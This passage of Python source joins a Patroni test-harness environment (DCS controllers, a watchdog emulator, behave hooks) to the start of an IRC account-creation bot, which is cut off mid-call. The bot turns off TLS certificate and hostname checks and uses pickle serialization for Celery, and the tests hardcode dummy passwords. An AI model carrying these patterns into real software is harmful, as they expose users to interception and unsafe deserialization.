        """Clean all contents stored in the tree used for the tests."""

    @classmethod
    def get_subclasses(cls):
        """Yield every (transitive) subclass, children before parents."""
        for subclass in cls.__subclasses__():
            yield from subclass.get_subclasses()
            yield subclass

    @classmethod
    def name(cls):
        # e.g. 'EtcdController' -> 'etcd' (strips the 'Controller' suffix)
        return cls.__name__[:-10].lower()
class ConsulController(AbstractDcsController):

    """Drives a local single-node consul agent for the tests."""

    def __init__(self, context):
        super(ConsulController, self).__init__(context)
        os.environ['PATRONI_CONSUL_HOST'] = 'localhost:8500'
        os.environ['PATRONI_CONSUL_REGISTER_SERVICE'] = 'on'
        self._config_file = None
        import consul
        self._client = consul.Consul()

    def _start(self):
        self._config_file = self._work_directory + '.json'
        with open(self._config_file, 'wb') as f:
            f.write(b'{"session_ttl_min":"5s","server":true,"bootstrap":true,"advertise_addr":"127.0.0.1"}')
        cmd = ['consul', 'agent', '-config-file', self._config_file, '-data-dir', self._work_directory]
        return subprocess.Popen(cmd, stdout=self._log, stderr=subprocess.STDOUT)

    def stop(self, kill=False, timeout=15):
        super(ConsulController, self).stop(kill=kill, timeout=timeout)
        if self._config_file:
            os.unlink(self._config_file)

    def _is_running(self):
        try:
            return bool(self._client.status.leader())
        except Exception:
            return False

    def path(self, key=None, scope='batman'):
        # consul keys carry no leading slash
        return super(ConsulController, self).path(key, scope)[1:]

    def query(self, key, scope='batman'):
        _, value = self._client.kv.get(self.path(key, scope))
        return value and value['Value'].decode('utf-8')

    def cleanup_service_tree(self):
        self._client.kv.delete(self.path(scope=''), recurse=True)

    def start(self, max_wait_limit=15):
        # narrower default wait limit than the base class
        super(ConsulController, self).start(max_wait_limit)
class AbstractEtcdController(AbstractDcsController):

    """Shared etcd v2/v3 harness: process control plus a liveness probe."""

    def __init__(self, context, client_cls):
        super(AbstractEtcdController, self).__init__(context)
        self._client_cls = client_cls

    def _start(self):
        cmd = ["etcd", "--debug", "--data-dir", self._work_directory]
        return subprocess.Popen(cmd, stdout=self._log, stderr=subprocess.STDOUT)

    def _is_running(self):
        from patroni.dcs.etcd import DnsCachingResolver
        config = {'host': 'localhost', 'port': 2379, 'retry_timeout': 30, 'patronictl': 1}
        try:
            # etcd may be running even though we didn't start it; constructing
            # a client only succeeds when the server is reachable.
            self._client = self._client_cls(config, DnsCachingResolver())
            return True
        except Exception:
            return False
class EtcdController(AbstractEtcdController):

    """etcd v2 flavour of the DCS test controller."""

    def __init__(self, context):
        from patroni.dcs.etcd import EtcdClient
        super(EtcdController, self).__init__(context, EtcdClient)
        os.environ['PATRONI_ETCD_HOST'] = 'localhost:2379'

    def query(self, key, scope='batman'):
        import etcd
        try:
            return self._client.get(self.path(key, scope)).value
        except etcd.EtcdKeyNotFound:
            return None

    def cleanup_service_tree(self):
        import etcd
        try:
            self._client.delete(self.path(scope=''), recursive=True)
        except (etcd.EtcdKeyNotFound, etcd.EtcdConnectionFailed):
            # nothing stored, or the server is already gone
            return
        except Exception as e:
            assert False, "exception when cleaning up etcd contents: {0}".format(e)
class Etcd3Controller(AbstractEtcdController):

    """etcd v3 flavour of the DCS test controller."""

    def __init__(self, context):
        from patroni.dcs.etcd3 import Etcd3Client
        super(Etcd3Controller, self).__init__(context, Etcd3Client)
        os.environ['PATRONI_ETCD3_HOST'] = 'localhost:2379'

    def query(self, key, scope='batman'):
        import base64
        response = self._client.range(self.path(key, scope))
        # an empty range implicitly returns None
        for kv in response.get('kvs', []):
            return base64.b64decode(kv['value']).decode('utf-8') if 'value' in kv else None

    def cleanup_service_tree(self):
        try:
            self._client.deleteprefix(self.path(scope=''))
        except Exception as e:
            assert False, "exception when cleaning up etcd contents: {0}".format(e)
class KubernetesController(AbstractDcsController):

    """Uses an already running Kubernetes cluster (kube context 'local') as the DCS.

    Fix: the two wait loops (pod deletion, pod-collection cleanup) polled the
    API server in a tight loop with no delay between requests; a short sleep
    between polls keeps them from hammering the server.
    """

    def __init__(self, context):
        super(KubernetesController, self).__init__(context)
        self._namespace = 'default'
        self._labels = {"application": "patroni"}
        self._label_selector = ','.join('{0}={1}'.format(k, v) for k, v in self._labels.items())
        os.environ['PATRONI_KUBERNETES_LABELS'] = json.dumps(self._labels)
        os.environ['PATRONI_KUBERNETES_USE_ENDPOINTS'] = 'true'
        os.environ['PATRONI_KUBERNETES_BYPASS_API_SERVICE'] = 'true'
        from patroni.dcs.kubernetes import k8s_client, k8s_config
        k8s_config.load_kube_config(context='local')
        self._client = k8s_client
        self._api = self._client.CoreV1Api()

    def _start(self):
        # nothing to launch: we talk to a cluster that is already running
        pass

    def create_pod(self, name, scope):
        """Create a bare pod labeled for *scope* (used as a cluster member stand-in)."""
        labels = self._labels.copy()
        labels['cluster-name'] = scope
        metadata = self._client.V1ObjectMeta(namespace=self._namespace, name=name, labels=labels)
        spec = self._client.V1PodSpec(containers=[self._client.V1Container(name=name, image='empty')])
        body = self._client.V1Pod(metadata=metadata, spec=spec)
        self._api.create_namespaced_pod(self._namespace, body)

    def delete_pod(self, name):
        """Delete the pod and wait until reads start failing (pod is gone)."""
        try:
            self._api.delete_namespaced_pod(name, self._namespace, body=self._client.V1DeleteOptions())
        except Exception:
            pass
        while True:
            try:
                self._api.read_namespaced_pod(name, self._namespace)
            except Exception:
                break
            time.sleep(0.5)  # throttle the polling instead of spinning on the API

    def query(self, key, scope='batman'):
        if key.startswith('members/'):
            pod = self._api.read_namespaced_pod(key[8:], self._namespace)
            return (pod.metadata.annotations or {}).get('status', '')
        else:
            try:
                ep = scope + {'leader': '', 'history': '-config', 'initialize': '-config'}.get(key, '-' + key)
                e = self._api.read_namespaced_endpoints(ep, self._namespace)
                if key != 'sync':
                    return e.metadata.annotations[key]
                else:
                    return json.dumps(e.metadata.annotations)
            except Exception:
                return None

    def cleanup_service_tree(self):
        """Delete all labeled pods/endpoints and wait until the pods are gone."""
        try:
            self._api.delete_collection_namespaced_pod(self._namespace, label_selector=self._label_selector)
        except Exception:
            pass
        try:
            self._api.delete_collection_namespaced_endpoints(self._namespace, label_selector=self._label_selector)
        except Exception:
            pass
        while True:
            result = self._api.list_namespaced_pod(self._namespace, label_selector=self._label_selector)
            if len(result.items) < 1:
                break
            time.sleep(0.5)  # throttle the polling instead of spinning on the API

    def _is_running(self):
        # the external cluster is assumed to be reachable
        return True
class ZooKeeperController(AbstractDcsController):

    """Handles all zookeeper related tasks, used for the tests setup and cleanup."""

    def __init__(self, context, export_env=True):
        super(ZooKeeperController, self).__init__(context, False)
        if export_env:
            os.environ['PATRONI_ZOOKEEPER_HOSTS'] = "'localhost:2181'"
        import kazoo.client
        self._client = kazoo.client.KazooClient()

    def _start(self):
        pass  # TODO: implement later

    def query(self, key, scope='batman'):
        import kazoo.exceptions
        try:
            value = self._client.get(self.path(key, scope))[0]
            return value.decode('utf-8')
        except kazoo.exceptions.NoNodeError:
            return None

    def cleanup_service_tree(self):
        import kazoo.exceptions
        try:
            self._client.delete(self.path(scope=''), recursive=True)
        except kazoo.exceptions.NoNodeError:
            return
        except Exception as e:
            assert False, "exception when cleaning up zookeeper contents: {0}".format(e)

    def _is_running(self):
        # zookeeper may already be running even though we didn't start it
        if self._client.connected:
            return True
        try:
            return self._client.start(1) or True
        except Exception:
            return False
class MockExhibitor(BaseHTTPRequestHandler):

    """Minimal Exhibitor lookalike: every GET reports a local zookeeper."""

    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'{"servers":["127.0.0.1"],"port":2181}')

    def log_message(self, fmt, *args):
        # keep the test output quiet
        pass
class ExhibitorController(ZooKeeperController):

    """ZooKeeper controller discovered through a mock Exhibitor HTTP endpoint."""

    def __init__(self, context):
        super(ExhibitorController, self).__init__(context, False)
        port = 8181
        server = HTTPServer(('', port), MockExhibitor)
        server.daemon_thread = True
        serve_thread = threading.Thread(target=server.serve_forever)
        serve_thread.daemon = True
        serve_thread.start()
        os.environ.update({'PATRONI_EXHIBITOR_HOSTS': 'localhost', 'PATRONI_EXHIBITOR_PORT': str(port)})
class RaftController(AbstractDcsController):

    """Runs patroni_raft_controller.py as a standalone raft partner node."""

    CONTROLLER_ADDR = 'localhost:1234'
    PASSWORD = '12345'

    def __init__(self, context):
        super(RaftController, self).__init__(context)
        os.environ.update(PATRONI_RAFT_PARTNER_ADDRS="'" + self.CONTROLLER_ADDR + "'",
                          PATRONI_RAFT_PASSWORD=self.PASSWORD, RAFT_PORT='1234')
        self._raft = None

    def _start(self):
        env = os.environ.copy()
        # the controller is not a partner of itself
        del env['PATRONI_RAFT_PARTNER_ADDRS']
        env['PATRONI_RAFT_SELF_ADDR'] = self.CONTROLLER_ADDR
        env['PATRONI_RAFT_DATA_DIR'] = self._work_directory
        return subprocess.Popen([sys.executable, '-m', 'coverage', 'run',
                                 '--source=patroni', '-p', 'patroni_raft_controller.py'],
                                stdout=self._log, stderr=subprocess.STDOUT, env=env)

    def query(self, key, scope='batman'):
        ret = self._raft.get(self.path(key, scope))
        return ret and ret['value']

    def set(self, key, value):
        self._raft.set(self.path(key), value)

    def cleanup_service_tree(self):
        from patroni.dcs.raft import KVStoreTTL
        if self._raft:
            # tear the old store down and restart the controller with a
            # fresh (empty) data directory
            self._raft.destroy()
            self.stop()
            os.makedirs(self._work_directory)
            self.start()
        ready_event = threading.Event()
        self._raft = KVStoreTTL(ready_event.set, None, None,
                                partner_addrs=[self.CONTROLLER_ADDR], password=self.PASSWORD)
        self._raft.startAutoTick()
        ready_event.wait()
class PatroniPoolController(object):
    """Manages the pool of Patroni instances started during a feature run."""

    # helper scripts used by the backup/restore based bootstrap scenarios
    BACKUP_SCRIPT = [sys.executable, 'features/backup_create.py']
    ARCHIVE_RESTORE_SCRIPT = ' '.join((sys.executable, os.path.abspath('features/archive-restore.py')))

    def __init__(self, context):
        self._context = context
        self._dcs = None
        self._output_dir = None
        self._patroni_path = None
        self._processes = {}
        self.create_and_set_output_directory('')
        # map of dcs name -> controller class, discovered by walking subclasses
        self.known_dcs = {subclass.name(): subclass for subclass in AbstractDcsController.get_subclasses()}

    @property
    def patroni_path(self):
        """Root of the patroni checkout (parent of the 'features' directory)."""
        if self._patroni_path is None:
            cwd = os.path.realpath(__file__)
            # walk upward until the 'features' component (or filesystem root)
            while True:
                cwd, entry = os.path.split(cwd)
                if entry == 'features' or cwd == '/':
                    break
            self._patroni_path = cwd
        return self._patroni_path

    @property
    def output_dir(self):
        """Directory where logs of the current feature are collected."""
        return self._output_dir

    def start(self, name, max_wait_limit=40, custom_config=None):
        """Start the Patroni instance called *name*, creating it on first use."""
        if name not in self._processes:
            self._processes[name] = PatroniController(self._context, name, self.patroni_path,
                                                      self._output_dir, custom_config)
        self._processes[name].start(max_wait_limit)

    def __getattr__(self, func):
        """Forward a whitelisted set of method names to a named PatroniController.

        Returns a wrapper taking the instance name as its first argument.
        """
        if func not in ['stop', 'query', 'write_label', 'read_label', 'check_role_has_changed_to',
                        'add_tag_to_config', 'get_watchdog', 'patroni_hang', 'backup']:
            raise AttributeError("PatroniPoolController instance has no attribute '{0}'".format(func))

        def wrapper(name, *args, **kwargs):
            return getattr(self._processes[name], func)(*args, **kwargs)
        return wrapper

    def stop_all(self):
        """Stop every known controller and forget about all of them."""
        for ctl in self._processes.values():
            ctl.cancel_background()
            ctl.stop()
        self._processes.clear()

    def create_and_set_output_directory(self, feature_name):
        """(Re)create the per-feature log directory and make it the current one."""
        feature_dir = os.path.join(self.patroni_path, 'features', 'output', feature_name.replace(' ', '_'))
        if os.path.exists(feature_dir):
            shutil.rmtree(feature_dir)
        os.makedirs(feature_dir)
        self._output_dir = feature_dir

    def clone(self, from_name, cluster_name, to_name):
        """Bootstrap *to_name* in cluster *cluster_name* via pg_basebackup from *from_name*."""
        f = self._processes[from_name]
        custom_config = {
            'scope': cluster_name,
            'bootstrap': {
                'method': 'pg_basebackup',
                'pg_basebackup': {
                    'command': " ".join(self.BACKUP_SCRIPT) + ' --walmethod=stream --dbname=' + f.backup_source
                },
                'dcs': {
                    'postgresql': {
                        'parameters': {
                            'max_connections': 101
                        }
                    }
                }
            },
            'postgresql': {
                'parameters': {
                    'archive_mode': 'on',
                    'archive_command': (self.ARCHIVE_RESTORE_SCRIPT + ' --mode archive ' +
                                        '--dirname {} --filename %f --pathname %p').format(
                        os.path.join(self.patroni_path, 'data', 'wal_archive'))
                },
                'authentication': {
                    'superuser': {'password': 'zalando1'},
                    'replication': {'password': 'rep-pass1'}
                }
            }
        }
        self.start(to_name, custom_config=custom_config)

    def bootstrap_from_backup(self, name, cluster_name):
        """Bootstrap *name* from the 'data/basebackup' backup, replaying the WAL archive."""
        custom_config = {
            'scope': cluster_name,
            'bootstrap': {
                'method': 'backup_restore',
                'backup_restore': {
                    'command': (sys.executable + ' features/backup_restore.py --sourcedir=' +
                                os.path.join(self.patroni_path, 'data', 'basebackup')),
                    'recovery_conf': {
                        'recovery_target_action': 'promote',
                        'recovery_target_timeline': 'latest',
                        'restore_command': (self.ARCHIVE_RESTORE_SCRIPT + ' --mode restore ' +
                                            '--dirname {} --filename %f --pathname %p').format(
                            os.path.join(self.patroni_path, 'data', 'wal_archive'))
                    }
                }
            },
            'postgresql': {
                'authentication': {
                    'superuser': {'password': 'zalando2'},
                    'replication': {'password': 'rep-pass2'}
                }
            }
        }
        self.start(name, custom_config=custom_config)

    @property
    def dcs(self):
        """Name of the DCS under test, taken once from $DCS (default: etcd)."""
        if self._dcs is None:
            self._dcs = os.environ.pop('DCS', 'etcd')
            assert self._dcs in self.known_dcs, 'Unsupported dcs: ' + self._dcs
        return self._dcs
class WatchdogMonitor(object):
    """Testing harness for emulating a watchdog device as a named pipe. Because we can't easily emulate ioctl's we
    require a custom driver on Patroni side. The device takes no action, only notes if it was pinged and/or triggered.
    """

    def __init__(self, name, work_directory, output_dir):
        self.fifo_path = os.path.join(work_directory, 'data', 'watchdog.{0}.fifo'.format(name))
        self.fifo_file = None
        self._stop_requested = False  # Relying on bool setting being atomic
        self._thread = None
        self.last_ping = None
        self.was_pinged = False
        self.was_closed = False
        self._was_triggered = False
        self.timeout = 60
        self._log_file = open(os.path.join(output_dir, 'watchdog.{0}.log'.format(name)), 'w')
        self._log("watchdog {0} initialized".format(name))

    def _log(self, msg):
        """Append a timestamped line to the per-watchdog log file."""
        tstamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S,%f")
        self._log_file.write("{0}: {1}\n".format(tstamp, msg))

    def start(self):
        """Create the fifo and launch the reader thread."""
        assert self._thread is None
        self._stop_requested = False
        self._log("starting fifo {0}".format(self.fifo_path))
        fifo_dir = os.path.dirname(self.fifo_path)
        # remove a stale fifo, or create its parent directory on first use
        if os.path.exists(self.fifo_path):
            os.unlink(self.fifo_path)
        elif not os.path.exists(fifo_dir):
            os.mkdir(fifo_dir)
        os.mkfifo(self.fifo_path)
        self.last_ping = time.time()
        self._thread = threading.Thread(target=self.run)
        self._thread.start()

    def run(self):
        """Reader loop: interpret single-byte commands written to the fifo.

        Protocol (one byte at a time):
          b'X' - stop the monitor thread entirely
          b''  - writer closed the pipe; reopen and wait for the next writer
          b'C' - followed by 'key=value\\n'; currently only 'timeout=<secs>'
          b'V' - "magic close" (device closed cleanly)
          b'1' - keep-alive ping
        """
        try:
            while not self._stop_requested:
                self._log("opening")
                # blocks until a writer opens the fifo
                self.fifo_file = os.open(self.fifo_path, os.O_RDONLY)
                try:
                    self._log("Fifo {0} connected".format(self.fifo_path))
                    self.was_closed = False
                    while not self._stop_requested:
                        c = os.read(self.fifo_file, 1)
                        if c == b'X':
                            self._log("Stop requested")
                            return
                        elif c == b'':
                            self._log("Pipe closed")
                            break
                        elif c == b'C':
                            # read the rest of the command up to the newline
                            command = b''
                            c = os.read(self.fifo_file, 1)
                            while c != b'\n' and c != b'':
                                command += c
                                c = os.read(self.fifo_file, 1)
                            command = command.decode('utf8')
                            if command.startswith('timeout='):
                                self.timeout = int(command.split('=')[1])
                                self._log("timeout={0}".format(self.timeout))
                        elif c in [b'V', b'1']:
                            cur_time = time.time()
                            # a ping/close that arrives later than the timeout
                            # means the watchdog would have fired
                            if cur_time - self.last_ping > self.timeout:
                                self._log("Triggered")
                                self._was_triggered = True
                            if c == b'V':
                                self._log("magic close")
                                self.was_closed = True
                            elif c == b'1':
                                self.was_pinged = True
                                self._log("ping after {0} seconds".format(cur_time - (self.last_ping or cur_time)))
                            self.last_ping = cur_time
                        else:
                            self._log('Unknown command {0} received from fifo'.format(c))
                finally:
                    self.was_closed = True
                    self._log("closing")
                    os.close(self.fifo_file)
        except Exception as e:
            self._log("Error {0}".format(e))
        finally:
            self._log("stopping")
            self._log_file.flush()
            if os.path.exists(self.fifo_path):
                os.unlink(self.fifo_path)

    def stop(self):
        """Ask the reader thread to exit and join it."""
        self._log("Monitor stop")
        self._stop_requested = True
        try:
            # wake the reader (it may be blocked in open/read) with an 'X'
            if os.path.exists(self.fifo_path):
                fd = os.open(self.fifo_path, os.O_WRONLY)
                os.write(fd, b'X')
                os.close(fd)
        except Exception as e:
            self._log("err while closing: {0}".format(str(e)))
        if self._thread:
            self._thread.join()
            self._thread = None

    def reset(self):
        """Clear the recorded ping/close/trigger flags."""
        self._log("reset")
        self.was_pinged = self.was_closed = self._was_triggered = False

    @property
    def was_triggered(self):
        # triggered if an overdue ping was already seen, or if the device is
        # still open and the last ping is older than the timeout
        delta = time.time() - self.last_ping
        triggered = self._was_triggered or not self.was_closed and delta > self.timeout
        self._log("triggered={0}, {1}s left".format(triggered, self.timeout - delta))
        return triggered
# actions to execute on start/stop of the tests and before running individual features
def before_all(context):
    """Start the DCS once for the whole run and attach harness objects to *context*."""
    os.environ.update({'PATRONI_RESTAPI_USERNAME': 'username', 'PATRONI_RESTAPI_PASSWORD': 'password'})
    context.ci = any(a in os.environ for a in ('TRAVIS_BUILD_NUMBER', 'BUILD_NUMBER', 'GITHUB_ACTIONS'))
    # MacOS CI machines are sometimes VERY slow
    context.timeout_multiplier = 5 if context.ci else 1
    context.pctl = PatroniPoolController(context)
    context.dcs_ctl = context.pctl.known_dcs[context.pctl.dcs](context)
    context.dcs_ctl.start()
    try:
        context.dcs_ctl.cleanup_service_tree()
    except AssertionError:
        # after_all handlers won't be executed in before_all
        context.dcs_ctl.stop()
        raise
def after_all(context):
    """Stop the DCS and produce the combined coverage report."""
    context.dcs_ctl.stop()
    for command in ('combine', 'report'):
        subprocess.call([sys.executable, '-m', 'coverage', command])
def before_feature(context, feature):
    """Create a per-feature output directory to collect Patroni and PostgreSQL logs."""
    context.pctl.create_and_set_output_directory(feature.name)
def after_feature(context, feature):
    """Stop all Patronis, remove their data directory and clean the keys in the DCS."""
    context.pctl.stop_all()
    shutil.rmtree(os.path.join(context.pctl.patroni_path, 'data'))
    context.dcs_ctl.cleanup_service_tree()
    if feature.status == 'failed':
        # keep the logs of failing features for later inspection
        shutil.copytree(context.pctl.output_dir, context.pctl.output_dir + '_failed')
|
ircbot.py | #!/usr/bin/env python3
"""IRC bot for doing stupid stuff and sometimes handling commands for account creation."""
import argparse
import collections
import functools
import getpass
import pkgutil
import re
import ssl
import threading
import time
from configparser import ConfigParser
from datetime import date
import irc.bot
import irc.connection
from celery import Celery
from irc.client import NickMask
from ocflib.account.submission import AccountCreationCredentials
from ocflib.account.submission import get_tasks
from ircbot.plugin import create
from ircbot.plugin import debian_security
from ircbot.plugin import rackspace_monitoring
# Connection target for the IRC server.
IRC_HOST = 'irc'
IRC_PORT = 6697
# Production (running as 'nobody') uses the real nick and channels;
# developers get a personal nick and channel so bots don't collide.
user = getpass.getuser()
if user == 'nobody':
    IRC_NICKNAME = 'create'
    IRC_CHANNELS_OPER = frozenset(('#rebuild', '#atool'))
    IRC_CHANNELS_ANNOUNCE = frozenset(('#atool',))
    IRC_CHANNELS_JOIN_MYSQL = True
else:
    IRC_NICKNAME = 'create-{}'.format(user)
    IRC_CHANNELS_OPER = IRC_CHANNELS_ANNOUNCE = frozenset(('#' + user,))
    IRC_CHANNELS_JOIN_MYSQL = False
# How many messages per channel are kept for the "recent messages" feature.
NUM_RECENT_MESSAGES = 10
# Check for Debian security announcements every 5 minutes
DSA_FREQ = 5
# Print out Rackspace monitoring status at most every minute
MONITOR_FREQ = 1
# 512 bytes is the max message length set by RFC 2812 on the max single message
# length, so messages need to split up into at least sections of that size,
# however clients (hexchat at least) appear to start cutting off less than that
# amount of text, so cut into small blocks to avoid that.
MAX_CLIENT_MSG = 435
class Listener(collections.namedtuple(
    'Listener',
    ('pattern', 'fn', 'help_text', 'require_mention', 'require_oper', 'require_privileged_oper'),
)):

    """A registered message handler: a regex plus its callback and requirements."""

    __slots__ = ()

    @property
    def help(self):
        """Explicit help text when given, otherwise the handler's docstring."""
        return self.help_text if self.help_text else self.fn.__doc__

    @property
    def plugin_name(self):
        """Module name of the handler function, unwrapping functools.partial."""
        fn = self.fn.func if isinstance(self.fn, functools.partial) else self.fn
        return fn.__module__
class MatchedMessage(collections.namedtuple(
    'MatchedMessage',
    ('channel', 'text', 'raw_text', 'match', 'is_oper', 'nick', 'respond'),
)):

    """A message matching a listener.

    :param channel: IRC channel (as a string).
    :param text: The message text after processing. Processing includes
                 chopping off the bot nickname from the front.
    :param raw_text: The raw, unparsed text. Usually "text" is more useful.
    :param match: The regex match object.
    :param is_oper: Whether the user is an operator.
    :param nick: The nickname of the user.
    :param respond: A function to respond to this message in the correct
                    channel and pinging the correct person.
    """

    __slots__ = ()
class CreateBot(irc.bot.SingleServerIRCBot):
    """IRC bot that runs plugins and relays account-creation events.

    Plugins register Listener objects via listen(); incoming public messages
    are matched against those listeners in on_pubmsg().

    Fixes:
    - ``ssl.wrap_socket`` was deprecated since Python 3.7 and removed in 3.12;
      the connection factory now uses an ``SSLContext`` configured with the
      same (unverified) behavior the old helper had.
    - ``on_pubmsg`` no longer indexes ``raw_text[0]`` (IndexError on an empty
      message); it uses ``startswith`` instead.
    """

    def __init__(
        self,
        tasks,
        nickserv_password,
        rt_password,
        rackspace_apikey,
        weather_apikey,
        mysql_password,
        marathon_creds,
        googlesearch_key,
        googlesearch_cx,
        discourse_apikey,
        twitter_apikeys,
    ):
        # per-channel ring buffer holding the last NUM_RECENT_MESSAGES (user, text)
        self.recent_messages = collections.defaultdict(
            functools.partial(collections.deque, maxlen=NUM_RECENT_MESSAGES),
        )
        self.topics = {}
        self.tasks = tasks
        self.rt_password = rt_password
        self.nickserv_password = nickserv_password
        self.rackspace_apikey = rackspace_apikey
        self.weather_apikey = weather_apikey
        self.mysql_password = mysql_password
        self.marathon_creds = marathon_creds
        self.googlesearch_key = googlesearch_key
        self.googlesearch_cx = googlesearch_cx
        self.discourse_apikey = discourse_apikey
        self.twitter_apikeys = twitter_apikeys
        self.listeners = set()
        self.plugins = {}
        self.extra_channels = set()  # plugins can add stuff here

        # Register plugins before joining the server.
        self.register_plugins()

        # ssl.wrap_socket was removed in Python 3.12; replicate its behavior
        # (TLS without certificate verification) with an explicit context.
        ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ssl_context.check_hostname = False
        ssl_context.verify_mode = ssl.CERT_NONE
        factory = irc.connection.Factory(wrapper=ssl_context.wrap_socket)
        super().__init__(
            [(IRC_HOST, IRC_PORT)],
            IRC_NICKNAME,
            IRC_NICKNAME,
            connect_factory=factory,
        )

    def register_plugins(self):
        """Import every module in ircbot/plugin and call its register() hook."""
        for importer, mod_name, _ in pkgutil.iter_modules(['ircbot/plugin']):
            mod = importer.find_module(mod_name).load_module(mod_name)
            self.plugins[mod_name] = mod
            register = getattr(mod, 'register', None)
            if register is not None:
                register(self)

    def listen(
        self,
        pattern,
        fn,
        flags=0,
        help_text=None,
        require_mention=False,
        require_oper=False,
        require_privileged_oper=False,
    ):
        """Register *fn* to be called for messages matching *pattern*."""
        self.listeners.add(Listener(
            pattern=re.compile(pattern, flags),
            fn=fn,
            help_text=help_text,
            require_mention=require_mention,
            require_oper=require_oper,
            require_privileged_oper=require_privileged_oper,
        ))

    def on_welcome(self, conn, _):
        """Identify to NickServ and join all configured channels."""
        conn.privmsg('NickServ', 'identify {}'.format(self.nickserv_password))
        # Join the "main" IRC channels.
        for channel in IRC_CHANNELS_OPER | IRC_CHANNELS_ANNOUNCE | self.extra_channels:
            conn.join(channel)

    def on_pubmsg(self, conn, event):
        """Dispatch a public message to every matching listener."""
        if event.target in self.channels:
            is_oper = False

            # event.source is like 'ckuehl!~ckuehl@raziel.ckuehl.me'
            assert event.source.count('!') == 1
            user = NickMask(event.source).nick

            # Don't respond to other create bots to avoid loops
            if user.startswith('create'):
                return

            if user in self.channels[event.target].opers():
                is_oper = True

            assert len(event.arguments) == 1
            raw_text = event.arguments[0]

            def respond(raw_text, ping=True):
                fmt = '{user}: {raw_text}' if ping else '{raw_text}'
                full_raw_text = fmt.format(user=user, raw_text=raw_text)
                self.say(event.target, full_raw_text)

            was_mentioned = raw_text.startswith((IRC_NICKNAME + ' ', IRC_NICKNAME + ': '))

            for listener in self.listeners:
                text = raw_text

                if listener.require_mention:
                    if was_mentioned:
                        # Chop off the bot nickname.
                        text = text.split(' ', 1)[1]
                    else:
                        continue

                if (
                    (listener.require_oper or listener.require_privileged_oper) and
                    not is_oper
                ):
                    continue

                # Prevent people from creating a channel, becoming oper,
                # inviting the bot, and approving/rejecting accounts without
                # "real" oper privilege.
                if listener.require_privileged_oper and event.target not in IRC_CHANNELS_OPER:
                    continue

                match = listener.pattern.search(text)
                if match is not None:
                    msg = MatchedMessage(
                        channel=event.target,
                        text=text,
                        raw_text=raw_text,
                        match=match,
                        is_oper=is_oper,
                        nick=user,
                        respond=respond,
                    )
                    listener.fn(self, msg)

            # everything gets logged except commands
            # (startswith also handles an empty message, which raw_text[0] did not)
            if not raw_text.startswith('!'):
                self.recent_messages[event.target].appendleft((user, raw_text))

    def on_currenttopic(self, connection, event):
        """Record the topic reported when we first join a channel."""
        channel, topic = event.arguments
        self.topics[channel] = topic

    def on_topic(self, connection, event):
        """Record a topic change."""
        topic, = event.arguments
        self.topics[event.target] = topic

    def on_invite(self, connection, event):
        # TODO: make this more plugin-like
        import ircbot.plugin.channels
        return ircbot.plugin.channels.on_invite(self, connection, event)

    def bump_topic(self):
        """Increment the counter in any 'days since ...' channel topics."""
        for channel, topic in self.topics.items():
            def plusone(m):
                return '{}: {}'.format(m.group(1), int(m.group(2)) + 1)

            new_topic = re.sub(r'(days since.*?): (\d+)', plusone, topic)
            if topic != new_topic:
                self.connection.topic(channel, new_topic=new_topic)

    def say(self, channel, message):
        """Send *message* to *channel*, splitting it to respect client limits."""
        # Find the length of the full message
        msg_len = len('PRIVMSG {} :{}\r\n'.format(channel, message).encode('utf-8'))

        # The message must be split up if over the length limit
        if msg_len > MAX_CLIENT_MSG:
            # Split up the full message into chunks to send
            msg_range = range(0, len(message), MAX_CLIENT_MSG)
            messages = [message[i:i + MAX_CLIENT_MSG] for i in msg_range]
            for msg in messages:
                self.connection.privmsg(channel, msg)
        else:
            self.connection.privmsg(channel, message)
def timer(bot):
    """Background loop for periodic work: topic bumps, DSA checks, monitoring."""
    last_date = None
    last_dsa_check = None
    last_monitor_check = None
    last_monitor_status = None

    # wait until the bot has actually connected before doing anything
    while not bot.connection.connected:
        time.sleep(2)

    # TODO: timers should register as plugins like listeners do
    while True:
        # bump "days since ..." topics once per day rollover
        last_date, old = date.today(), last_date
        if old and last_date != old:
            bot.bump_topic()

        # announce new Debian security advisories every DSA_FREQ minutes
        if last_dsa_check is None or time.time() - last_dsa_check > 60 * DSA_FREQ:
            last_dsa_check = time.time()
            for line in debian_security.get_new_dsas():
                bot.say('#rebuild', line)

        # poll Rackspace monitoring at most every MONITOR_FREQ minutes
        if last_monitor_check is None or time.time() - last_monitor_check > 60 * MONITOR_FREQ:
            last_monitor_check = time.time()
            try:
                new_monitor_status = rackspace_monitoring.get_summary(bot.rackspace_apikey)
            except Exception as ex:
                new_monitor_status = 'Error getting status: {}'.format(ex)

            # Only print out Rackspace status if it has changed since the last check
            if last_monitor_status and last_monitor_status != new_monitor_status:
                bot.say('#rebuild', new_monitor_status)

            last_monitor_status = new_monitor_status

        time.sleep(1)
def main():
    """Read config, wire up celery and the IRC bot, then babysit the threads."""
    parser = argparse.ArgumentParser(
        description='OCF account creation IRC bot',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    parser.add_argument(
        '-c',
        '--config',
        default='/etc/ocf-ircbot/ocf-ircbot.conf',
        help='Config file to read from.',
    )
    args = parser.parse_args()

    conf = ConfigParser()
    conf.read(args.config)

    celery = Celery(
        broker=conf.get('celery', 'broker'),
        backend=conf.get('celery', 'backend'),
    )
    celery.conf.broker_use_ssl = {
        'ssl_ca_certs': '/etc/ssl/certs/ca-certificates.crt',
        'ssl_cert_reqs': ssl.CERT_REQUIRED,
    }
    # `redis_backend_use_ssl` is an OCF patch which was proposed upstream:
    # https://github.com/celery/celery/pull/3831
    celery.conf.redis_backend_use_ssl = {
        'ssl_cert_reqs': ssl.CERT_NONE,
    }

    # TODO: stop using pickle
    celery.conf.task_serializer = 'pickle'
    celery.conf.result_serializer = 'pickle'
    celery.conf.accept_content = {'pickle'}

    # e.g. the field 'nickserv_password' maps to conf section 'nickserv', key 'password'
    creds = AccountCreationCredentials(**{
        field: conf.get(*field.split('_'))
        for field in AccountCreationCredentials._fields
    })
    tasks = get_tasks(celery, credentials=creds)

    bot = CreateBot(
        tasks,
        conf.get('nickserv', 'password'),
        conf.get('rt', 'password'),
        conf.get('rackspace', 'apikey'),
        conf.get('weather_underground', 'apikey'),
        conf.get('mysql', 'password'),
        (conf.get('marathon', 'user'), conf.get('marathon', 'password')),
        conf.get('googlesearch', 'key'),
        conf.get('googlesearch', 'cx'),
        conf.get('discourse', 'apikey'),
